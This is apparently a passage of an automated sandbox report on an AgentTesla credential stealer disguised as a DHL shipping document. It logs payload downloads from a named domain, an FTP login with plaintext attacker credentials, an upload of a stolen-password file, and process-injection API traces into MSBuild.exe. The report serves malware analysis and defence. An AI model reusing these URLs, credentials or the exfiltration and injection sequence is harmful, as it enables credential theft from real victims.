Aug 2, 2024 15:02:16.595942974 CEST | 49708 | 21    | 192.168.2.9     | 108.179.234.136
Aug 2, 2024 15:02:16.680628061 CEST | 21    | 49708 | 108.179.234.136 | 192.168.2.9
Aug 2, 2024 15:02:16.721031904 CEST | 49708 | 21    | 192.168.2.9     | 108.179.234.136
Aug 2, 2024 15:02:17.174089909 CEST | 49677 | 443   | 192.168.2.9     | 20.189.173.11
Aug 2, 2024 15:02:23.982774973 CEST | 49704 | 443   | 192.168.2.9     | 23.206.229.209
Aug 2, 2024 15:02:23.982898951 CEST | 49704 | 443   | 192.168.2.9     | 23.206.229.209
Aug 2, 2024 15:02:23.983156919 CEST | 49712 | 443   | 192.168.2.9     | 23.206.229.209
Aug 2, 2024 15:02:23.983198881 CEST | 443   | 49712 | 23.206.229.209  | 192.168.2.9
Aug 2, 2024 15:02:23.983283043 CEST | 49712 | 443   | 192.168.2.9     | 23.206.229.209
Aug 2, 2024 15:02:23.983475924 CEST | 49712 | 443   | 192.168.2.9     | 23.206.229.209
Aug 2, 2024 15:02:23.983491898 CEST | 443   | 49712 | 23.206.229.209  | 192.168.2.9
Aug 2, 2024 15:02:23.987704039 CEST | 443   | 49704 | 23.206.229.209  | 192.168.2.9
Aug 2, 2024 15:02:23.987787008 CEST | 443   | 49704 | 23.206.229.209  | 192.168.2.9
Aug 2, 2024 15:02:24.602525949 CEST | 443   | 49712 | 23.206.229.209  | 192.168.2.9
Aug 2, 2024 15:02:24.602597952 CEST | 49712 | 443   | 192.168.2.9     | 23.206.229.209
Aug 2, 2024 15:02:43.798448086 CEST | 443   | 49712 | 23.206.229.209  | 192.168.2.9
Aug 2, 2024 15:02:43.798580885 CEST | 49712 | 443   | 192.168.2.9     | 23.206.229.209
Aug 2, 2024 15:02:56.768076897 CEST | 49705 | 80    | 192.168.2.9     | 199.232.214.172
Aug 2, 2024 15:02:56.773600101 CEST | 80    | 49705 | 199.232.214.172 | 192.168.2.9
Aug 2, 2024 15:02:56.773694038 CEST | 49705 | 80    | 192.168.2.9     | 199.232.214.172
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 2, 2024 15:02:09.493565083 CEST | 52343 | 53    | 192.168.2.9     | 1.1.1.1
Aug 2, 2024 15:02:09.541275024 CEST | 53    | 52343 | 1.1.1.1         | 192.168.2.9
Aug 2, 2024 15:02:14.369546890 CEST | 49980 | 53    | 192.168.2.9     | 1.1.1.1
Aug 2, 2024 15:02:14.720894098 CEST | 53    | 49980 | 1.1.1.1         | 192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Aug 2, 2024 15:02:09.493565083 CEST | 192.168.2.9 | 1.1.1.1 | 0xc81b | Standard query (0) | investdirectinsurance.com | A (IP address) | IN (0x0001) | false
Aug 2, 2024 15:02:14.369546890 CEST | 192.168.2.9 | 1.1.1.1 | 0xaf88 | Standard query (0) | ftp.wapination.net | A (IP address) | IN (0x0001) | false
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Aug 2, 2024 15:02:09.541275024 CEST | 1.1.1.1 | 192.168.2.9 | 0xc81b | No error (0) | investdirectinsurance.com | | 172.67.189.102 | A (IP address) | IN (0x0001) | false |
| Aug 2, 2024 15:02:09.541275024 CEST | 1.1.1.1 | 192.168.2.9 | 0xc81b | No error (0) | investdirectinsurance.com | | 104.21.65.79 | A (IP address) | IN (0x0001) | false |
| Aug 2, 2024 15:02:14.720894098 CEST | 1.1.1.1 | 192.168.2.9 | 0xaf88 | No error (0) | ftp.wapination.net | wapination.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Aug 2, 2024 15:02:14.720894098 CEST | 1.1.1.1 | 192.168.2.9 | 0xaf88 | No error (0) | wapination.net | | 108.179.234.136 | A (IP address) | IN (0x0001) | false |
| Aug 2, 2024 15:02:23.140566111 CEST | 1.1.1.1 | 192.168.2.9 | 0x9531 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Aug 2, 2024 15:02:23.140566111 CEST | 1.1.1.1 | 192.168.2.9 | 0x9531 | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false |
| Aug 2, 2024 15:02:36.011159897 CEST | 1.1.1.1 | 192.168.2.9 | 0x3c39 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Aug 2, 2024 15:02:36.011159897 CEST | 1.1.1.1 | 192.168.2.9 | 0x3c39 | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false |
• investdirectinsurance.com

| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
| --- | --- | --- | --- | --- | --- | --- |
| 0 | 192.168.2.9 | 49706 | 172.67.189.102 | 443 | 5836 | C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe |
2024-08-02 13:02:10 UTC, 134 bytes, OUT:
GET /assuence/litesolidCha/Mindwall.bl HTTP/1.1
User-Agent: Mozilla/5.0
Host: investdirectinsurance.com
Cache-Control: no-cache

2024-08-02 13:02:10 UTC, 685 bytes, IN:
HTTP/1.1 200 OK
Date: Fri, 02 Aug 2024 13:02:10 GMT
Content-Type: application/octet-stream
Content-Length: 15872
Connection: close
etag: "3e00-66a9a0ac-21601;;;"
last-modified: Wed, 31 Jul 2024 02:25:48 GMT
accept-ranges: bytes
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QYdbogyO1JnuKxub24vPl%2Fa6rmatZSTuTiZdUZmpY2MYuH%2F%2Bcgq5sAPqny8TNIcB8PxOXk73LHTT%2F4FnmkDSPCM7S%2FC1g%2BoSbgX04KW8AbGc06QMMnmRu6TDmDNCsfrnOl1zpqV4JdGUzFXB"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ace42c20c4b4276-EWR
alt-svc: h3=":443"; ma=86400


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
| --- | --- | --- | --- | --- | --- | --- |
| 1 | 192.168.2.9 | 49707 | 172.67.189.102 | 443 | 5836 | C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe |

2024-08-02 13:02:11 UTC, 130 bytes, OUT:
GET /assuence/litesolidCha/Pano.bl HTTP/1.1
User-Agent: Mozilla/5.0
Host: investdirectinsurance.com
Cache-Control: no-cache

2024-08-02 13:02:12 UTC, 689 bytes, IN:
HTTP/1.1 200 OK
Date: Fri, 02 Aug 2024 13:02:12 GMT
Content-Type: application/octet-stream
Content-Length: 238592
Connection: close
etag: "3a400-66ac718b-21650;;;"
last-modified: Fri, 02 Aug 2024 05:41:31 GMT
accept-ranges: bytes
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RULSnnxpg7%2FGX01oq2tAvx8odyfFV%2F3SaT2dZUsM77iXj4eDaNDdiPVIDXiIvydqfATqeZXYYmHRUWNTCfSO1Wedy2io4GtEXZDotz%2FY%2FXanthR4gjBvVMXgtBQ9gMf%2F6ePvcVv0%2FG2%2BdmUX"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ace42ccceac42b5-EWR
alt-svc: h3=":443"; ma=86400


| Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands |
| --- | --- | --- | --- | --- | --- |
| Aug 2, 2024 15:02:15.256807089 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.9 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- |
| | | | | | 220-You are user number 4 of 150 allowed. |
| | | | | | 220-Local time is now 08:02. Server port: 21. |
| | | | | | 220-IPv6 connections are also welcome on this server. |
| | | | | | 220 You will be disconnected after 15 minutes of inactivity. |
| Aug 2, 2024 15:02:15.257108927 CEST | 49708 | 21 | 192.168.2.9 | 108.179.234.136 | USER pop@wapination.net |
| Aug 2, 2024 15:02:15.372625113 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.9 | 331 User pop@wapination.net OK. Password required |
| Aug 2, 2024 15:02:15.372781038 CEST | 49708 | 21 | 192.168.2.9 | 108.179.234.136 | PASS sync@#1235 |
| Aug 2, 2024 15:02:15.577150106 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.9 | 230 OK. Current restricted directory is / |
| Aug 2, 2024 15:02:15.696149111 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.9 | 504 Unknown command |
| Aug 2, 2024 15:02:15.696368933 CEST | 49708 | 21 | 192.168.2.9 | 108.179.234.136 | PWD |
| Aug 2, 2024 15:02:15.813287020 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.9 | 257 "/" is your current location |
| Aug 2, 2024 15:02:15.813568115 CEST | 49708 | 21 | 192.168.2.9 | 108.179.234.136 | TYPE I |
| Aug 2, 2024 15:02:15.929900885 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.9 | 200 TYPE is now 8-bit binary |
| Aug 2, 2024 15:02:15.932024002 CEST | 49708 | 21 | 192.168.2.9 | 108.179.234.136 | PASV |
| Aug 2, 2024 15:02:16.068078041 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.9 | 227 Entering Passive Mode (108,179,234,136,186,192) |
| Aug 2, 2024 15:02:16.074553967 CEST | 49708 | 21 | 192.168.2.9 | 108.179.234.136 | STOR PW_user-760639_2024_08_02_09_02_13.html |
| Aug 2, 2024 15:02:16.545480013 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.9 | 150 Accepted data connection |
| Aug 2, 2024 15:02:16.680628061 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.9 | 226-File successfully transferred |
| | | | | | 226 0.121 seconds (measured here), 2.56 Kbytes per second |


Target ID: 1
Start time: 09:02:04
Start date: 02/08/2024
Path: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe"
Imagebase: 0xfd0000
File size: 92'672 bytes
MD5 hash: C9BEC29F669D714CD80E368748D7024C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1416664051.0000000003281000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.1416664051.0000000003281000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1416790317.00000000132E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.1416790317.00000000132E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

                                                        Target ID:3
                                                        Start time:09:02:11
                                                        Start date:02/08/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                        Imagebase:0x9d0000
                                                        File size:262'432 bytes
                                                        MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2592099804.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2591102452.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2591102452.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2592099804.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2592099804.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false


                                                          Execution Graph

                                                          Execution Coverage:20.8%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:7.7%
                                                          Total number of Nodes:39
                                                          Total number of Limit Nodes:0

                                                          Control-flow Graph

                                                          control_flow_graph 238 7ff886e32072-7ff886e32fc5 242 7ff886e32fee-7ff886e3307b InternetReadFile 238->242 243 7ff886e32fc7-7ff886e32feb 238->243 244 7ff886e3307d 242->244 245 7ff886e33083-7ff886e330e3 242->245 243->242 244->245
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1419677123.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff886e30000_DHL Shipping Documents 0016229753_PDF.jbxd
                                                          Similarity
                                                          • API ID: FileInternetRead
                                                          • String ID:
                                                          • API String ID: 778332206-0
                                                          • Opcode ID: d178f1f45d25ff763a926a7ffb79fcc9151437d541da0d6ba542ba5baeb677a2
                                                          • Instruction ID: 85a8edc89dd699e58732e19e0422089c7e551688ed879dbd6f49d3e8cbaf2c52
                                                          • Opcode Fuzzy Hash: d178f1f45d25ff763a926a7ffb79fcc9151437d541da0d6ba542ba5baeb677a2
                                                          • Instruction Fuzzy Hash: 8D51097091861D8FDB58DF98C885BE9BBF0FB69311F1041AED049A3251DB74A985CF81

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1419677123.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff886e30000_DHL Shipping Documents 0016229753_PDF.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID: M_^
                                                          • API String ID: 3559483778-921959145
                                                          • Opcode ID: 513f8199032f306718f29f4c6decc7972a4b0a4c0aed808f2ca4bb3461967da5
                                                          • Instruction ID: f0036010967d606b6c9d63b275175b7fc27797cc30f6602135665347070f0af2
                                                          • Opcode Fuzzy Hash: 513f8199032f306718f29f4c6decc7972a4b0a4c0aed808f2ca4bb3461967da5
                                                          • Instruction Fuzzy Hash: 8D610570908A5D8FDB94DFA8C884BE9BBF1FB69311F1081AAD04DE7252DB349985CF41

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1419677123.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff886e30000_DHL Shipping Documents 0016229753_PDF.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: 5f5505279883e4ff900c02cb3a1c79ee4f05323c2597308606cb20085005d6a3
                                                          • Instruction ID: 94a0d403c97e349c9be29a93830f25334dbea8dd43cca35f83599fd9fcbc4c8f
                                                          • Opcode Fuzzy Hash: 5f5505279883e4ff900c02cb3a1c79ee4f05323c2597308606cb20085005d6a3
                                                          • Instruction Fuzzy Hash: D4611570908A5D8FDB94DFA8C884BE9BBF1FB69311F1081AAD04CE7252CB349984CF41

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1419677123.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff886e30000_DHL Shipping Documents 0016229753_PDF.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: 9e7cdc5f5be263210b2b518375c01af60bfefc8596612be5a5ef3ae660e4679e
                                                          • Instruction ID: 91b1de2d512b4e39d72f4be3460a58c479127c72798661e3d0588294fd17a217
                                                          • Opcode Fuzzy Hash: 9e7cdc5f5be263210b2b518375c01af60bfefc8596612be5a5ef3ae660e4679e
                                                          • Instruction Fuzzy Hash: E8027030918A8E8FDBB4DF28C855BE977E1FF59351F10012AD84ECB291DB749A45CB41

                                                          Control-flow Graph

                                                          control_flow_graph 176 7ff886e32a69-7ff886e32b2e 179 7ff886e32b4a-7ff886e32b66 176->179 180 7ff886e32b30-7ff886e32b47 176->180 181 7ff886e32b68-7ff886e32b7f 179->181 182 7ff886e32b82-7ff886e32b92 179->182 180->179 181->182 183 7ff886e32bae-7ff886e32c3b InternetOpenW 182->183 184 7ff886e32b94-7ff886e32bab 182->184 185 7ff886e32c3d 183->185 186 7ff886e32c43-7ff886e32cbb 183->186 184->183 185->186
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1419677123.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff886e30000_DHL Shipping Documents 0016229753_PDF.jbxd
                                                          Similarity
                                                          • API ID: InternetOpen
                                                          • String ID:
                                                          • API String ID: 2038078732-0
                                                          • Opcode ID: 3d452bb6335920c828964be50640064974a84669566be799e17abd579d27e2d1
                                                          • Instruction ID: 0fd8aa692b9b57abba0a39f79d4ea31cd8824e3e229a0da0c0b16fdcc3a93978
                                                          • Opcode Fuzzy Hash: 3d452bb6335920c828964be50640064974a84669566be799e17abd579d27e2d1
                                                          • Instruction Fuzzy Hash: 38814430908A5D8FDB98DF58C858BE9BBF1FB69311F1001AED04EE3651CB74A981CB40

                                                          Control-flow Graph

                                                          control_flow_graph 189 7ff886e32cbd-7ff886e32d82 193 7ff886e32d9e-7ff886e32dae 189->193 194 7ff886e32d84-7ff886e32d9b 189->194 195 7ff886e32dca-7ff886e32e76 InternetOpenUrlW 193->195 196 7ff886e32db0-7ff886e32dc7 193->196 194->193 197 7ff886e32e78 195->197 198 7ff886e32e7e-7ff886e32ef8 195->198 196->195 197->198
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1419677123.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff886e30000_DHL Shipping Documents 0016229753_PDF.jbxd
                                                          Similarity
                                                          • API ID: InternetOpen
                                                          • String ID:
                                                          • API String ID: 2038078732-0
                                                          • Opcode ID: 428f4b46801c8e4c1ba6ddface93dde8c0ec81ce7ad05ab2a6eb239708d7aa0d
                                                          • Instruction ID: 66715a75fe2e5f7a8e53ea7fe8519b0afec1e61df49838328e098f81bf0ee9fe
                                                          • Opcode Fuzzy Hash: 428f4b46801c8e4c1ba6ddface93dde8c0ec81ce7ad05ab2a6eb239708d7aa0d
                                                          • Instruction Fuzzy Hash: D3713370908A5D8FDB98DF58C895BE9BBF1FB69311F1001AED04EE3691DB74A980CB41

                                                          Control-flow Graph

                                                          control_flow_graph 201 7ff886e32042-7ff886e32b2e 205 7ff886e32b4a-7ff886e32b66 201->205 206 7ff886e32b30-7ff886e32b47 201->206 207 7ff886e32b68-7ff886e32b7f 205->207 208 7ff886e32b82-7ff886e32b92 205->208 206->205 207->208 209 7ff886e32bae-7ff886e32c3b InternetOpenW 208->209 210 7ff886e32b94-7ff886e32bab 208->210 211 7ff886e32c3d 209->211 212 7ff886e32c43-7ff886e32cbb 209->212 210->209 211->212
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1419677123.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff886e30000_DHL Shipping Documents 0016229753_PDF.jbxd
                                                          Similarity
                                                          • API ID: InternetOpen
                                                          • String ID:
                                                          • API String ID: 2038078732-0
                                                          • Opcode ID: 5c3a11b82855f99f8f33f7493429f7dbb4e7fd19f4934dff502e3c9b8e475fc9
                                                          • Instruction ID: 0faa714a7cdfe973387ca118398d09cf9fed26710f6022f395566269b36d5782
                                                          • Opcode Fuzzy Hash: 5c3a11b82855f99f8f33f7493429f7dbb4e7fd19f4934dff502e3c9b8e475fc9
                                                          • Instruction Fuzzy Hash: C9710270908A1D8FDBA8DF58C859BE9BBF1FB69311F1041AED00EE3651DB75A981CB40

                                                          Control-flow Graph

                                                          control_flow_graph 215 7ff886e32052-7ff886e32d82 219 7ff886e32d9e-7ff886e32dae 215->219 220 7ff886e32d84-7ff886e32d9b 215->220 221 7ff886e32dca-7ff886e32e76 InternetOpenUrlW 219->221 222 7ff886e32db0-7ff886e32dc7 219->222 220->219 223 7ff886e32e78 221->223 224 7ff886e32e7e-7ff886e32ef8 221->224 222->221 223->224
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1419677123.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff886e30000_DHL Shipping Documents 0016229753_PDF.jbxd
                                                          Similarity
                                                          • API ID: InternetOpen
                                                          • String ID:
                                                          • API String ID: 2038078732-0
                                                          • Opcode ID: 1fa24fe874f6de09d862753502bd4e0629e95a1338ce39f2f4297b3ba4011ca2
                                                          • Instruction ID: 744a8d0469026cc225ee63c4cfba5512858eb9e33daf488b40f7d9d5e90e728c
                                                          • Opcode Fuzzy Hash: 1fa24fe874f6de09d862753502bd4e0629e95a1338ce39f2f4297b3ba4011ca2
                                                          • Instruction Fuzzy Hash: C371F170908A1D8FDB98EF58C885BE9BBF1FB69301F1041AED04EE3651DB75A980CB41

                                                          Control-flow Graph

                                                          control_flow_graph 227 7ff886e388d5-7ff886e388e1 228 7ff886e388ec-7ff886e38a29 VirtualAllocEx 227->228 229 7ff886e388e3-7ff886e388eb 227->229 234 7ff886e38a2b 228->234 235 7ff886e38a31-7ff886e38a9d 228->235 229->228 234->235
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1419677123.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff886e30000_DHL Shipping Documents 0016229753_PDF.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 0c53dc2a6e8838ebabd16f95995215d34d1bb8f9644ecea323af3b3d2fccab68
                                                          • Instruction ID: 515d37357d38044632a05f34dc652699df74738736f189be69c912f7560d0cb2
                                                          • Opcode Fuzzy Hash: 0c53dc2a6e8838ebabd16f95995215d34d1bb8f9644ecea323af3b3d2fccab68
                                                          • Instruction Fuzzy Hash: 42511870918A5D8FDF94EF58C885BE9BBF1FB69310F1041AAD04DE3252CB35A985CB41

                                                          Control-flow Graph

                                                          control_flow_graph 248 7ff886e32f19-7ff886e32fc5 252 7ff886e32fee-7ff886e3307b InternetReadFile 248->252 253 7ff886e32fc7-7ff886e32feb 248->253 254 7ff886e3307d 252->254 255 7ff886e33083-7ff886e330e3 252->255 253->252 254->255
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1419677123.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff886e30000_DHL Shipping Documents 0016229753_PDF.jbxd
                                                          Similarity
                                                          • API ID: FileInternetRead
                                                          • String ID:
                                                          • API String ID: 778332206-0
                                                          • Opcode ID: 7a6c4acd0933b0d72c727b0b98637d7524406403c72ed9513665680c9d4cad9f
                                                          • Instruction ID: 0e85eff8113979efe9809ea30eb3ad0a299822b4679380980ce32d39110e4609
                                                          • Opcode Fuzzy Hash: 7a6c4acd0933b0d72c727b0b98637d7524406403c72ed9513665680c9d4cad9f
                                                          • Instruction Fuzzy Hash: 33511870D18A1C8FDB58DF98C885BE9BBF0FB69311F1041AED049A3251DB70A985CF81

                                                          Control-flow Graph

                                                          control_flow_graph 258 7ff886e390ad-7ff886e390b9 259 7ff886e390bb-7ff886e390c3 258->259 260 7ff886e390c4-7ff886e391ff ReadProcessMemory 258->260 259->260 265 7ff886e39201 260->265 266 7ff886e39207-7ff886e39269 260->266 265->266
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1419677123.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff886e30000_DHL Shipping Documents 0016229753_PDF.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessRead
                                                          • String ID:
                                                          • API String ID: 1726664587-0
                                                          • Opcode ID: bbc4937860954990c525a2febaf468d8a488f00bef0c539f9616806b52b2a640
                                                          • Instruction ID: 0d015f990c7cae209960e63895d580bd0629134656acfb6d6c8d61282233870a
                                                          • Opcode Fuzzy Hash: bbc4937860954990c525a2febaf468d8a488f00bef0c539f9616806b52b2a640
                                                          • Instruction Fuzzy Hash: C2511630D08A5D8FDB94DF58C884BE9BBB1FB69311F1081AAD44DE7252DB74A985CF40

                                                          Control-flow Graph

                                                          control_flow_graph 269 7ff886e385de-7ff886e385eb 270 7ff886e385ed-7ff886e385f5 269->270 271 7ff886e385f6-7ff886e386b2 269->271 270->271 275 7ff886e386d4-7ff886e38736 Wow64SetThreadContext 271->275 276 7ff886e386b4-7ff886e386d1 271->276 278 7ff886e38738 275->278 279 7ff886e3873e-7ff886e38794 275->279 276->275 278->279
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1419677123.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff886e30000_DHL Shipping Documents 0016229753_PDF.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: a9df595fb75ca2ac86144fd6cd36ce63fe0d4b677187b636fdfd12b27e594303
                                                          • Instruction ID: ea30209e5f3e032b1fd95b67f0ccd5c502fa35a065c6c06db5811cda7cd2792f
                                                          • Opcode Fuzzy Hash: a9df595fb75ca2ac86144fd6cd36ce63fe0d4b677187b636fdfd12b27e594303
                                                          • Instruction Fuzzy Hash: 74516A30D0864D8FEB55DFA8C849BEDBBF1FB65311F1482AAD048E7256CB789885CB40

                                                          Control-flow Graph

                                                          control_flow_graph 282 7ff886e38799-7ff886e387a5 283 7ff886e387b0-7ff886e38880 ResumeThread 282->283 284 7ff886e387a7-7ff886e387af 282->284 288 7ff886e38888-7ff886e388d2 283->288 289 7ff886e38882 283->289 284->283 289->288
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1419677123.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff886e30000_DHL Shipping Documents 0016229753_PDF.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 65937b55f4b2ccc70ae83f4274b07f3d693dff337334ad3284203c3421a50d67
                                                          • Instruction ID: 09c9e0e3c1a5169fc0d60b12f2c755dc089e4492cab44f57563c1990fcd5c29b
                                                          • Opcode Fuzzy Hash: 65937b55f4b2ccc70ae83f4274b07f3d693dff337334ad3284203c3421a50d67
                                                          • Instruction Fuzzy Hash: 8D412870D0864D8FDB99DFA8C885AEDBBF0FF56311F10416AD449E7252CA34A885CF41
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1419677123.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff886e30000_DHL Shipping Documents 0016229753_PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0ebae087c31eab7bef7568e571fc790c77dde0a6d7888bc56b5f1bd043558b78
                                                          • Instruction ID: 37605a7e8c30dbc09a6d1c45073989a73f09c268c0ebbe411ecae14efb6ab375
                                                          • Opcode Fuzzy Hash: 0ebae087c31eab7bef7568e571fc790c77dde0a6d7888bc56b5f1bd043558b78
